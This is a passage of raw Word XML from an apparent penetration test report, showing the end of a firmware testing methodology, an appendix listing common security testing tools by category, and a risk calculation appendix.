              <w:t>This analysis typically involves reverse engineering the firmware to extract</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>the file system, configuration files, and other critical components.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Statically </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>analyze</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> extracted filesystem configuration files and binaries for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>vulnerabilities.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">► Emulating firmware </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Emulating firmware files and components to verify potential vulnerabilities.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>► Dynamic analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Performing dynamic security testing against firmware and application interfaces in its normal or emulated environment.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>► Runtime analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Analyze</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> compiled binaries during device runtime. Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>► Binary Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution to compromised firmware/devices. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>► Reporting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Easy to consume executive summary and detailed findings report prepared by documenting the findings based on CVSS scoring along with risk assessment and fix recommendation, including steps that can be taken to mitigate each vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03DF2229" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E2017" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc200562857"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix B - Tools and Utilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="5E91D7BD" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Some of the tools used for pen test are as follows:</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99"/>
        <w:gridCol w:w="1770"/>
        <w:gridCol w:w="1917"/>
        <w:gridCol w:w="1393"/>
        <w:gridCol w:w="1770"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="331B38DA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="1C0E4F25" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Web Application/API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="6BFEFDFA" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="30626139" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Mobile Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="493895DB" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Thick Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="1AD9DDB5" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Firmware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="080954E2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3660E3B4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="56"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>BurpSuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">     Professional</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ OWASP ZAP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Insomnia</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ SOAP UI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Web developer  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>tools and browser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>extensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0C486F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="56"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Nessus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Metasploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Wireshark</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Kubehunter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Custom Scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78438E35" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="56"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Genymotion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ APK Tool</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ JDGUI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>MobSF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Frida</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B376D2" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="56"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Procmon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SysInternal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Fiddler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49E241F6" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="56"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Binwalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Emba/Embark</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Firmadyne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>FactCore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Firmwalker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>qemu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ByteSweep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Radare2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  ▪ Custom Scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="690A25C2" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc200562858"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix C</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="45578481" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Risk assessment evaluated by PTC is based on the number of Critical/High/Mediums identified along with the overall size of the product tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49831A76" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Risk Calculation Matrix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459AF34A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144D8AC8" wp14:editId="110A5974">
            <wp:extent cx="6350000" cy="1327868"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Drawing 25" descr="ptclargelogo"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 25" descr="ptclargelogo"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6366208" cy="1331257"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009604BC">
      <w:headerReference w:type="default" r:id="rId83"/>
      <w:footerReference w:type="default" r:id="rId84"/>
      <w:headerReference w:type="first" r:id="rId85"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="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DB1BB" w14:textId="77777777" w:rsidR="00890A70" w:rsidRDefault="00890A70">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
